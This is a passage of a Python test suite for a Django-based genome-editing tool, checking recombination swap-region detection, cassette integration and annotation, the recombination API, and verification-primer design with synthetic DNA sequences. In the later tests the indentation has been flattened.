    edge.recombine.CHECK_JUNCTION_RIGHT_UP = 40
    edge.recombine.CHECK_JUNCTION_RIGHT_DN = 10
    edge.recombine.SINGLE_CROSSOVER_MAX_GAP = 10
def tearDown(self):
    """Restore the edge.recombine module tunables saved in setUp."""
    edge.recombine.SINGLE_CROSSOVER_MAX_GAP = self.old_single_cross_over_gap_max
    edge.recombine.CHECK_JUNCTION_RIGHT_DN = self.old_check_junction_rd
    edge.recombine.CHECK_JUNCTION_RIGHT_UP = self.old_check_junction_ru
    edge.recombine.CHECK_JUNCTION_LEFT_DN = self.old_check_junction_ld
    edge.recombine.CHECK_JUNCTION_LEFT_UP = self.old_check_junction_lu
def build_genome(self, circular, *templates):
    """Create and return a test Genome with one fragment per template.

    Each template sequence becomes a Fragment attached to the genome; any
    stale BLAST fasta file for the fragment is removed, then the genome
    BLAST databases are rebuilt so find_swap_region/recombine can run.
    """
    g = Genome(name='Foo')
    g.save()
    for seq in templates:
        f = Fragment.create_with_sequence('Bar', seq, circular=circular)
        Genome_Fragment(genome=g, fragment=f, inherited=False).save()
        try:
            os.unlink(fragment_fasta_fn(f))
        except OSError:
            # The fasta file may not exist yet; cleanup is best-effort.
            # (Narrowed from a bare 'except:' which also hid real bugs
            # such as KeyboardInterrupt or NameError.)
            pass
    build_all_genome_dbs(refresh=True)
    # Re-fetch so callers get a fresh instance reflecting the saved state.
    return Genome.objects.get(pk=g.id)
def test_finds_correct_region_for_swapping(self):
    """The swap region covers front arm, middle and back arm of the template."""
    upstream = "gagattgtccgcgtttt"
    front_bs = "catagcgcacaggacgcggag"
    middle = "cggcacctgtgagccg"
    back_bs = "taatgaccccgaagcagg"
    downstream = "gttaaggcgcgaacat"
    replaced = "aaaaaaaaaaaaaaaaaaa"
    template = ''.join([upstream, front_bs, middle, back_bs, downstream])
    cassette = ''.join([front_bs, replaced, back_bs])
    arm_len = min(len(front_bs), len(back_bs))
    g = self.build_genome(False, template)
    regions = find_swap_region(g, cassette, arm_len)
    self.assertEquals(len(regions), 1)
    region = regions[0]
    frag = g.fragments.all()[0]
    self.assertEquals(region.fragment_id, frag.id)
    self.assertEquals(region.fragment_name, frag.name)
    self.assertEquals(region.start, len(upstream) + 1)
    self.assertEquals(region.end, len(template) - len(downstream))
    self.assertEquals(region.sequence, ''.join([front_bs, middle, back_bs]))
    self.assertEquals(region.cassette_reversed, False)
    self.assertEquals(region.front_arm, front_bs[0:arm_len])
    self.assertEquals(region.back_arm, back_bs[-arm_len:])
def test_finding_swap_region_across_circular_boundary(self):
    """Swap region is found when the region wraps the circular origin."""
    upstream = "gagattgtccgcgtttt"
    front_bs = "catagcgcacaggacgcggag"
    middle = "cggcacctgtgagccg"
    back_bs = "taatgaccccgaagcagg"
    downstream = "gttaaggcgcgaacat"
    replaced = "aaaaaaaaaaaaaaaaaaa"
    cassette = ''.join([front_bs, replaced, back_bs])
    arm_len = min(len(front_bs), len(back_bs))
    # Rotate the template so 'middle' is split 8 bases across the origin.
    template = ''.join([middle[8:], back_bs, downstream, upstream, front_bs, middle[0:8]])
    g = self.build_genome(True, template)
    r = find_swap_region(g, cassette, arm_len)
    self.assertEquals(len(r), 1)
    self.assertEquals(r[0].fragment_id, g.fragments.all()[0].id)
    self.assertEquals(r[0].fragment_name, g.fragments.all()[0].name)
    # start lies near the template's end; end wraps past the origin.
    self.assertEquals(r[0].start, len(template) - 8 - len(front_bs) + 1)
    self.assertEquals(r[0].end, len(middle) - 8 + len(back_bs))
    self.assertEquals(r[0].sequence, ''.join([front_bs, middle, back_bs]))
    self.assertEquals(r[0].cassette_reversed, False)
    self.assertEquals(r[0].front_arm, front_bs[0:arm_len])
    self.assertEquals(r[0].back_arm, back_bs[-arm_len:])
def test_finding_swap_region_when_front_arm_is_across_circular_boundary(self):
    """Swap region is found when the front arm itself spans the origin."""
    upstream = "gagattgtccgcgtttt"
    front_bs = "catagcgcacaggacgcggag"
    middle = "cggcacctgtgagccg"
    back_bs = "taatgaccccgaagcagg"
    downstream = "gttaaggcgcgaacat"
    replaced = "aaaaaaaaaaaaaaaaaaa"
    cassette = ''.join([front_bs, replaced, back_bs])
    arm_len = min(len(front_bs), len(back_bs))
    # Rotate the template so 'front_bs' is split 8 bases across the origin.
    template = ''.join([front_bs[8:], middle, back_bs, downstream, upstream, front_bs[0:8]])
    g = self.build_genome(True, template)
    r = find_swap_region(g, cassette, arm_len)
    self.assertEquals(len(r), 1)
    self.assertEquals(r[0].fragment_id, g.fragments.all()[0].id)
    self.assertEquals(r[0].fragment_name, g.fragments.all()[0].name)
    # start is in the last 8 bases; end wraps past the origin.
    self.assertEquals(r[0].start, len(template) - 8 + 1)
    self.assertEquals(r[0].end, len(front_bs + middle + back_bs) - 8)
    self.assertEquals(r[0].sequence, ''.join([front_bs, middle, back_bs]))
    self.assertEquals(r[0].cassette_reversed, False)
    self.assertEquals(r[0].front_arm, front_bs[0:arm_len])
    self.assertEquals(r[0].back_arm, back_bs[-arm_len:])
def test_finding_swap_region_when_back_arm_is_across_circular_boundary(self):
    """Swap region is found when the back arm itself spans the origin."""
    upstream = "gagattgtccgcgtttt"
    front_bs = "catagcgcacaggacgcggag"
    middle = "cggcacctgtgagccg"
    back_bs = "taatgaccccgaagcagg"
    downstream = "gttaaggcgcgaacat"
    replaced = "aaaaaaaaaaaaaaaaaaa"
    cassette = ''.join([front_bs, replaced, back_bs])
    arm_len = min(len(front_bs), len(back_bs))
    # Rotate the template so 'back_bs' is split 8 bases across the origin.
    template = ''.join([back_bs[8:], downstream, upstream, front_bs, middle, back_bs[0:8]])
    g = self.build_genome(True, template)
    r = find_swap_region(g, cassette, arm_len)
    self.assertEquals(len(r), 1)
    self.assertEquals(r[0].fragment_id, g.fragments.all()[0].id)
    self.assertEquals(r[0].fragment_name, g.fragments.all()[0].name)
    # start is mid-template; end wraps into the first 8 bases.
    self.assertEquals(r[0].start, len(back_bs) - 8 + len(downstream + upstream) + 1)
    self.assertEquals(r[0].end, len(back_bs) - 8)
    self.assertEquals(r[0].sequence, ''.join([front_bs, middle, back_bs]))
    self.assertEquals(r[0].cassette_reversed, False)
    self.assertEquals(r[0].front_arm, front_bs[0:arm_len])
    self.assertEquals(r[0].back_arm, back_bs[-arm_len:])
def test_finds_correct_region_for_swapping_with_reverse_complement_cassette(self):
    """A reverse-complemented cassette still matches, with cassette_reversed set."""
    upstream = "gagattgtccgcgtttt"
    front_bs = "catagcgcacaggacgcggag"
    middle = "cggcacctgtgagccg"
    back_bs = "taatgaccccgaagcagg"
    downstream = "gttaaggcgcgaacat"
    replaced = "aaaaaaaaaaaaaaaaaaa"
    cassette = str(Seq(''.join([front_bs, replaced, back_bs])).reverse_complement())
    arm_len = min(len(front_bs), len(back_bs))
    template = ''.join([upstream, front_bs, middle, back_bs, downstream])
    g = self.build_genome(False, template)
    regions = find_swap_region(g, cassette, arm_len)
    self.assertEquals(len(regions), 1)
    region = regions[0]
    frag = g.fragments.all()[0]
    self.assertEquals(region.fragment_id, frag.id)
    self.assertEquals(region.fragment_name, frag.name)
    self.assertEquals(region.start, len(upstream) + 1)
    self.assertEquals(region.end, len(template) - len(downstream))
    self.assertEquals(region.sequence, ''.join([front_bs, middle, back_bs]))
    self.assertEquals(region.cassette_reversed, True)
    # Arms are reported relative to the cassette, so they come back
    # reverse-complemented and swapped.
    self.assertEquals(region.front_arm, str(Seq(back_bs[-arm_len:]).reverse_complement()))
    self.assertEquals(region.back_arm, str(Seq(front_bs[0:arm_len]).reverse_complement()))
def test_finding_reverse_complement_region_across_circular_boundary(self):
    """A reverse-complemented cassette matches a region wrapping the origin."""
    upstream = "gagattgtccgcgtttt"
    front_bs = "catagcgcacaggacgcggag"
    middle = "cggcacctgtgagccg"
    back_bs = "taatgaccccgaagcagg"
    downstream = "gttaaggcgcgaacat"
    replaced = "aaaaaaaaaaaaaaaaaaa"
    cassette = str(Seq(''.join([front_bs, replaced, back_bs])).reverse_complement())
    arm_len = min(len(front_bs), len(back_bs))
    # Rotate the template so 'middle' is split 8 bases across the origin.
    template = ''.join([middle[8:], back_bs, downstream, upstream, front_bs, middle[0:8]])
    g = self.build_genome(True, template)
    r = find_swap_region(g, cassette, arm_len)
    self.assertEquals(len(r), 1)
    self.assertEquals(r[0].fragment_id, g.fragments.all()[0].id)
    self.assertEquals(r[0].fragment_name, g.fragments.all()[0].name)
    self.assertEquals(r[0].start, len(template) - 8 - len(front_bs) + 1)
    self.assertEquals(r[0].end, len(middle) - 8 + len(back_bs))
    self.assertEquals(r[0].sequence, ''.join([front_bs, middle, back_bs]))
    self.assertEquals(r[0].cassette_reversed, True)
    # Arms come back reverse-complemented and swapped for a reversed cassette.
    self.assertEquals(r[0].front_arm, str(Seq(back_bs[-arm_len:]).reverse_complement()))
    self.assertEquals(r[0].back_arm, str(Seq(front_bs[0:arm_len]).reverse_complement()))
def test_finding_reverse_complement_region_when_front_arm_is_across_circular_boundary(self):
    """Reverse-complemented cassette matches when front_bs spans the origin."""
    upstream = "gagattgtccgcgtttt"
    front_bs = "catagcgcacaggacgcggag"
    middle = "cggcacctgtgagccg"
    back_bs = "taatgaccccgaagcagg"
    downstream = "gttaaggcgcgaacat"
    replaced = "aaaaaaaaaaaaaaaaaaa"
    cassette = str(Seq(''.join([front_bs, replaced, back_bs])).reverse_complement())
    arm_len = min(len(front_bs), len(back_bs))
    # Rotate the template so 'front_bs' is split 8 bases across the origin.
    template = ''.join([front_bs[8:], middle, back_bs, downstream, upstream, front_bs[0:8]])
    g = self.build_genome(True, template)
    r = find_swap_region(g, cassette, arm_len)
    self.assertEquals(len(r), 1)
    self.assertEquals(r[0].fragment_id, g.fragments.all()[0].id)
    self.assertEquals(r[0].fragment_name, g.fragments.all()[0].name)
    self.assertEquals(r[0].start, len(template) - 8 + 1)
    self.assertEquals(r[0].end, len(front_bs + middle + back_bs) - 8)
    self.assertEquals(r[0].sequence, ''.join([front_bs, middle, back_bs]))
    self.assertEquals(r[0].cassette_reversed, True)
    # Arms come back reverse-complemented and swapped for a reversed cassette.
    self.assertEquals(r[0].front_arm, str(Seq(back_bs[-arm_len:]).reverse_complement()))
    self.assertEquals(r[0].back_arm, str(Seq(front_bs[0:arm_len]).reverse_complement()))
def test_finding_reverse_complement_region_when_back_arm_is_across_circular_boundary(self):
    """Reverse-complemented cassette matches when back_bs spans the origin."""
    upstream = "gagattgtccgcgtttt"
    front_bs = "catagcgcacaggacgcggag"
    middle = "cggcacctgtgagccg"
    back_bs = "taatgaccccgaagcagg"
    downstream = "gttaaggcgcgaacat"
    replaced = "aaaaaaaaaaaaaaaaaaa"
    cassette = str(Seq(''.join([front_bs, replaced, back_bs])).reverse_complement())
    arm_len = min(len(front_bs), len(back_bs))
    # Rotate the template so 'back_bs' is split 8 bases across the origin.
    template = ''.join([back_bs[8:], downstream, upstream, front_bs, middle, back_bs[0:8]])
    g = self.build_genome(True, template)
    r = find_swap_region(g, cassette, arm_len)
    self.assertEquals(len(r), 1)
    self.assertEquals(r[0].fragment_id, g.fragments.all()[0].id)
    self.assertEquals(r[0].fragment_name, g.fragments.all()[0].name)
    self.assertEquals(r[0].start, len(back_bs) - 8 + len(downstream + upstream) + 1)
    self.assertEquals(r[0].end, len(back_bs) - 8)
    self.assertEquals(r[0].sequence, ''.join([front_bs, middle, back_bs]))
    self.assertEquals(r[0].cassette_reversed, True)
    # Arms come back reverse-complemented and swapped for a reversed cassette.
    self.assertEquals(r[0].front_arm, str(Seq(back_bs[-arm_len:]).reverse_complement()))
    self.assertEquals(r[0].back_arm, str(Seq(front_bs[0:arm_len]).reverse_complement()))
def test_recombines_correctly(self):
    """recombine() yields a new genome whose sequence carries the cassette."""
    upstream = "gagattgtccgcgtttt"
    front_bs = "catagcgcacaggacgcggag"
    middle = "cggcacctgtgagccg"
    back_bs = "taatgaccccgaagcagg"
    downstream = "gttaaggcgcgaacat"
    replaced = "a" * 100
    template = ''.join([upstream, front_bs, middle, back_bs, downstream])
    cassette = ''.join([front_bs, replaced, back_bs])
    arm_len = min(len(front_bs), len(back_bs))
    g = self.build_genome(False, template)
    c = recombine(g, cassette, arm_len)
    # A new genome is created rather than the original being modified.
    self.assertNotEqual(g.id, c.id)
    expected = ''.join([upstream, cassette, downstream])
    self.assertEquals(c.fragments.all()[0].indexed_fragment().sequence, expected)
def test_recombines_ignoring_extra_bases_upstream_and_downstream_of_cassette(self):
    """Extra flanking 'c' bases on the cassette are ignored by recombine()."""
    upstream = "gagattgtccgcgtttt"
    front_bs = "catagcgcacaggacgcggagcgacgtagtctgcatctgatgcatgcactac"
    middle = "cggcacctgtgagccg"
    back_bs = "taatgaccccgaagcagggcatcgtactactgatgcatgcacactgacgta"
    downstream = "gttaaggcgcgaacat"
    replaced = "a" * 100
    template = ''.join([upstream, front_bs, middle, back_bs, downstream])
    cassette = ''.join(['c' * 6 + front_bs, replaced, back_bs + 'c' * 6])
    # Floor division keeps arm_len an int under Python 3 as well; plain '/'
    # would yield a float there (identical result under Python 2).
    arm_len = min(len(front_bs), len(back_bs)) // 2
    g = self.build_genome(False, template)
    c = recombine(g, cassette, arm_len)
    self.assertNotEqual(g.id, c.id)
    self.assertEquals(c.fragments.all()[0].indexed_fragment().sequence,
                      ''.join([upstream, front_bs, replaced, back_bs, downstream]))
def test_creates_operation(self):
    """recombine() records exactly one RECOMBINATION Operation with its params."""
    upstream = "gagattgtccgcgtttt"
    front_bs = "catagcgcacaggacgcggag"
    middle = "cggcacctgtgagccg"
    back_bs = "taatgaccccgaagcagg"
    downstream = "gttaaggcgcgaacat"
    replaced = "aaaaaaaaaaaaaaaaaaa"
    template = ''.join([upstream, front_bs, middle, back_bs, downstream])
    cassette = ''.join([front_bs, replaced, back_bs])
    arm_len = min(len(front_bs), len(back_bs))
    g = self.build_genome(False, template)
    self.assertEquals(Operation.objects.count(), 0)
    c = recombine(g, cassette, arm_len)
    self.assertEquals(Operation.objects.count(), 1)
    op = c.operation_set.all()[0]
    self.assertEquals(op.type, Operation.RECOMBINATION[0])
    expected_params = json.dumps(dict(cassette=cassette, homology_arm_length=arm_len))
    self.assertEquals(op.params, expected_params)
def test_annotates_cassette(self):
    """recombine() adds a forward-strand annotation spanning the cassette."""
    upstream = "gagattgtccgcgtttt"
    front_bs = "catagcgcacaggacgcggag"
    middle = "cggcacctgtgagccg"
    back_bs = "taatgaccccgaagcagg"
    downstream = "gttaaggcgcgaacat"
    replaced = "aaaaaaaaaaaaaaaaaaa"
    template = ''.join([upstream, front_bs, middle, back_bs, downstream])
    cassette = ''.join([front_bs, replaced, back_bs])
    arm_len = min(len(front_bs), len(back_bs))
    g = self.build_genome(False, template)
    # No annotations on the original genome before recombination.
    a = g.fragments.all()[0].indexed_fragment().annotations()
    self.assertEquals(len(a), 0)
    c = recombine(g, cassette, arm_len)
    a = c.fragments.all()[0].indexed_fragment().annotations()
    self.assertEquals(len(a), 1)
    # The annotation covers the inserted cassette exactly.
    self.assertEquals(a[0].base_first, len(upstream) + 1)
    self.assertEquals(a[0].base_last, len(upstream + cassette))
    self.assertEquals(a[0].feature_base_first, 1)
    self.assertEquals(a[0].feature_base_last, len(cassette))
    self.assertEquals(a[0].feature.strand, 1)
    self.assertEquals(a[0].feature.operation.type, Operation.RECOMBINATION[0])
    self.assertEquals(a[0].feature.operation.genome, c)
def test_annotates_reversed_cassette(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = str(Seq(''.join([front_bs, replaced, back_bs])).reverse_complement())
arm_len = min(len(front_bs), len(back_bs))
g = self.build_genome(False, template)
a = g.fragments.all()[0].indexed_fragment().annotations()
self.assertEquals(len(a), 0)
c = recombine(g, cassette, arm_len)
a = c.fragments.all()[0].indexed_fragment().annotations()
self.assertEquals(len(a), 1)
self.assertEquals(a[0].base_first, len(upstream) + 1)
self.assertEquals(a[0].base_last, len(upstream + cassette))
self.assertEquals(a[0].feature_base_first, 1)
self.assertEquals(a[0].feature_base_last, len(cassette))
# on reverse strand
self.assertEquals(a[0].feature.strand, -1)
self.assertEquals(a[0].feature.operation.type, Operation.RECOMBINATION[0])
self.assertEquals(a[0].feature.operation.genome, c)
def test_integrates_and_annotates_cassette_across_circular_boundary(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
template = ''.join([middle[8:], back_bs, downstream, upstream, front_bs, middle[0:8]])
g = self.build_genome(True, template)
c = recombine(g, cassette, arm_len)
self.assertNotEqual(g.id, c.id)
self.assertEquals(c.fragments.all()[0].indexed_fragment().sequence,
''.join([downstream, upstream, cassette]))
a = c.fragments.all()[0].indexed_fragment().annotations()
self.assertEquals(len(a), 1)
self.assertEquals(a[0].base_first, len(downstream + upstream) + 1)
self.assertEquals(a[0].base_last, len(downstream + upstream + cassette))
self.assertEquals(a[0].feature_base_first, 1)
self.assertEquals(a[0].feature_base_last, len(cassette))
self.assertEquals(a[0].feature.strand, 1)
self.assertEquals(a[0].feature.operation.type, Operation.RECOMBINATION[0])
self.assertEquals(a[0].feature.operation.genome, c)
def test_recombine_when_front_arm_is_across_circular_boundary(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
template = ''.join([front_bs[8:], middle, back_bs, downstream, upstream, front_bs[0:8]])
g = self.build_genome(True, template)
c = recombine(g, cassette, arm_len)
self.assertNotEqual(g.id, c.id)
self.assertEquals(c.fragments.all()[0].indexed_fragment().sequence,
''.join([downstream, upstream, cassette]))
def test_recombine_when_back_arm_is_across_circular_boundary(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
template = ''.join([back_bs[8:], downstream, upstream, front_bs, middle, back_bs[0:8]])
g = self.build_genome(True, template)
c = recombine(g, cassette, arm_len)
self.assertNotEqual(g.id, c.id)
self.assertEquals(c.fragments.all()[0].indexed_fragment().sequence,
''.join([downstream, upstream, cassette]))
def test_recombines_with_reverse_complement_cassette_correctly(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = str(Seq(''.join([front_bs, replaced, back_bs])).reverse_complement())
arm_len = min(len(front_bs), len(back_bs))
g = self.build_genome(False, template)
c = recombine(g, cassette, arm_len)
self.assertNotEqual(g.id, c.id)
self.assertEquals(c.fragments.all()[0].indexed_fragment().sequence,
''.join([upstream, front_bs, replaced, back_bs, downstream]))
def test_find_swap_region_api(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
g = self.build_genome(False, template)
res = self.client.post('/edge/genomes/%s/recombination/' % g.id,
data=json.dumps(dict(cassette=cassette,
homology_arm_length=arm_len,
create=False)),
content_type='application/json')
self.assertEquals(res.status_code, 200)
r = json.loads(res.content)
self.assertEquals(len(r), 1)
self.assertEquals(r[0]['fragment_id'], g.fragments.all()[0].id)
self.assertEquals(r[0]['fragment_name'], g.fragments.all()[0].name)
self.assertEquals(r[0]['start'], len(upstream) + 1)
self.assertEquals(r[0]['end'], len(template) - len(downstream))
self.assertEquals(r[0]['sequence'], ''.join([front_bs, middle, back_bs]))
self.assertEquals(r[0]['cassette_reversed'], False)
self.assertEquals(r[0]['front_arm'], front_bs[0:arm_len])
self.assertEquals(r[0]['back_arm'], back_bs[-arm_len:])
def test_recombination_api(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
g = self.build_genome(False, template)
res = self.client.post('/edge/genomes/%s/recombination/' % g.id,
data=json.dumps(dict(cassette=cassette,
homology_arm_length=arm_len,
create=True,
genome_name='FooBar')),
content_type='application/json')
self.assertEquals(res.status_code, 201)
r = json.loads(res.content)
self.assertEquals(r['name'], 'FooBar')
c = Genome.objects.get(pk=r['id'])
self.assertEquals(c.fragments.all()[0].indexed_fragment().sequence,
''.join([upstream, cassette, downstream]))
def test_recombines_multiple_times_on_different_fragments(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaaaaa"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = ''.join([front_bs, replaced, back_bs])
f1 = 't' * 20 + template + 'c' * 20 + template + 'c' * 30
f2 = 't' * 40 + template + 'c' * 15 + template + 'c' * 20
arm_len = min(len(front_bs), len(back_bs))
g = self.build_genome(False, f1, f2)
self.assertEquals(g.fragments.count(), 2)
c = recombine(g, cassette, arm_len)
self.assertEquals(c.fragments.count(), 2)
sequences = [f.indexed_fragment().sequence for f in c.fragments.all()]
sequences = sorted(sequences, key=lambda s: len(s))
self.assertEquals(sequences[0],
't' * 20 + upstream + cassette + downstream +
'c' * 20 + upstream + cassette + downstream + 'c' * 30)
self.assertEquals(sequences[1],
't' * 40 + upstream + cassette + downstream +
'c' * 15 + upstream + cassette + downstream + 'c' * 20)
def test_recombines_multiple_times_on_circular_fragment(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaaaaa"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = ''.join([front_bs, replaced, back_bs])
f = (
middle[0:8]
+ back_bs
+ downstream
+ 't' * 20
+ template
+ 'c' * 20
+ upstream
+ front_bs
+ middle[8:]
)
arm_len = min(len(front_bs), len(back_bs))
g = self.build_genome(True, f)
c = recombine(g, cassette, arm_len)
self.assertEquals(c.fragments.all()[0].indexed_fragment().sequence,
downstream + 't' * 20 + upstream + cassette + downstream +
'c' * 20 + upstream + cassette)
def test_multiple_recombines_return_same_child(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
g = self.build_genome(False, template)
res = self.client.post('/edge/genomes/%s/recombination/' % g.id,
data=json.dumps(dict(cassette=cassette,
homology_arm_length=arm_len,
create=True,
genome_name='FooBar')),
content_type='application/json')
self.assertEquals(res.status_code, 201)
r = json.loads(res.content)
c1 = r['id']
res = self.client.post('/edge/genomes/%s/recombination/' % g.id,
data=json.dumps(dict(cassette=cassette,
homology_arm_length=arm_len,
create=True,
genome_name='FooBar')),
content_type='application/json')
# returns 200 not 201
self.assertEquals(res.status_code, 200)
r = json.loads(res.content)
c2 = r['id']
self.assertEquals(c1, c2)
def test_multiple_recombines_return_active_child(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
g = self.build_genome(False, template)
res = self.client.post('/edge/genomes/%s/recombination/' % g.id,
data=json.dumps(dict(cassette=cassette,
homology_arm_length=arm_len,
create=True,
genome_name='FooBar')),
content_type='application/json')
self.assertEquals(res.status_code, 201)
r = json.loads(res.content)
c = Genome.objects.get(pk=r['id'])
c.active = False
c.save()
res = self.client.post('/edge/genomes/%s/recombination/' % g.id,
data=json.dumps(dict(cassette=cassette,
homology_arm_length=arm_len,
create=True,
genome_name='FooBar')),
content_type='application/json')
self.assertEquals(res.status_code, 200)
r = json.loads(res.content)
c = Genome.objects.get(pk=r['id'])
self.assertEquals(c.active, True)
def __test_verification_primers(self, template, middle, cassette, arm_len, is_reversed):
from edge.pcr import pcr_from_genome
g = self.build_genome(False, template)
r = find_swap_region(g, cassette, arm_len, design_primers=True)
self.assertEquals(len(r), 1)
self.assertEquals(len(r[0].verification_cassette), 5)
self.assertEquals(len(r[0].verification_front), 5)
self.assertEquals(len(r[0].verification_back), 5)
# cassette verification primers should work on unmodified genome
for primer in r[0].verification_cassette:
p = pcr_from_genome(g, primer['PRIMER_LEFT_SEQUENCE'], primer['PRIMER_RIGHT_SEQUENCE'])
self.assertNotEqual(p[0], None)
self.assertEquals(p[0].index(middle) >= 0, True)
# front verification primers should NOT produce product
for primer in r[0].verification_front:
p = pcr_from_genome(g, primer['PRIMER_LEFT_SEQUENCE'], primer['PRIMER_RIGHT_SEQUENCE'])
self.assertEqual(p[0], None)
# back verification primers should NOT produce product
for primer in r[0].verification_back:
p = pcr_from_genome(g, primer['PRIMER_LEFT_SEQUENCE'], primer['PRIMER_RIGHT_SEQUENCE'])
self.assertEqual(p[0], None)
# do recombination, then try primers again on modified genome
c = recombine(g, cassette, arm_len)
for f in c.fragments.all():
try:
os.unlink(fragment_fasta_fn(f))
except:
pass
build_all_genome_dbs(refresh=True)
# reload to get blastdb
c = Genome.objects.get(pk=c.id)
if is_reversed:
cassette = str(Seq(cassette).reverse_complement())
# cassette verification primers should work on modified genome, finding cassette
for primer in r[0].verification_cassette:
p = pcr_from_genome(c, primer['PRIMER_LEFT_SEQUENCE'], primer['PRIMER_RIGHT_SEQUENCE'])
self.assertNotEqual(p[0], None)
self.assertEquals(p[0].index(cassette) >= 0, True)
# front verification primers should find a product including front of cassette
for primer in r[0].verification_front:
p = pcr_from_genome(c, primer['PRIMER_LEFT_SEQUENCE'], primer['PRIMER_RIGHT_SEQUENCE'])
self.assertNotEqual(p[0], None)
self.assertEquals(p[0].index(cassette[0:edge.recombine.CHECK_JUNCTION_LEFT_DN]) >= 0,
True)
# back verification primers should find a product including back of cassette
for primer in r[0].verification_back:
p = pcr_from_genome(c, primer['PRIMER_LEFT_SEQUENCE'], primer['PRIMER_RIGHT_SEQUENCE'])
self.assertNotEqual(p[0], None)
self.assertEquals(p[0].index(cassette[-edge.recombine.CHECK_JUNCTION_RIGHT_UP:]) >= 0,
True)
def test_finds_verification_primers_for_swap_region(self):
upstream = "gagattgtccgcgttttagctgatacgtacgtgtcgatcgacttgcgtatctgatcatctgacgtagat"
front_bs = "catagcgcacaggacgcggag"
middle = "ccagtcgctgaggcagtcgatgcaggcatcgatcaggctggcacctgtgagccgagctcacgtatgcatcatcattga"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacatagctagtactagtcacgtagtcatttgtcgtacgtacgtattgagtcatca"
replaced = "gactacgatcagtcgtagtaacgcgtagcgtagtcagcgtacacgtacgtagacgacgtacatgcatcgtactgtatc"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
self.__test_verification_primers(template, middle, cassette, arm_len, False)
def test_finds_verification_primers_with_reverse_complement_cassette(self):
upstream = "gagattgtccgcgttttagctgatacgtacgtgtcgatcgacttgcgtatctgatcatctgacgtagat"
front_bs = "catagcgcacaggacgcggag"
middle = "ccagtcgctgaggcagtcgatgcaggcatcgatcaggctggcacctgtgagccgagctcacgtatgcatcatcattga"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacatagctagtactagtcacgtagtcatttgtcgtacgtacgtattgagtcatca"
replaced = "gactacgatcagtcgtagtaacgcgtagcgtagtcagcgtacacgtacgtagacgacgtacatgcatcgtactgtatc"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = str(Seq(''.join([front_bs, replaced, back_bs])).reverse_complement())
arm_len = min(len(front_bs), len(back_bs))
self.__test_verification_primers(template, middle, cassette, arm_len, True)
def test_does_not_return_front_back_junction_verification_primers_if_they_are_not_useful(self):
upstream = "gagattgtccgcgttttagctgatacgtacgtgtcgatcgacttgcgtatctgatcatctgacgtagat"
front_bs = "catagcgcacaggacgcggag"
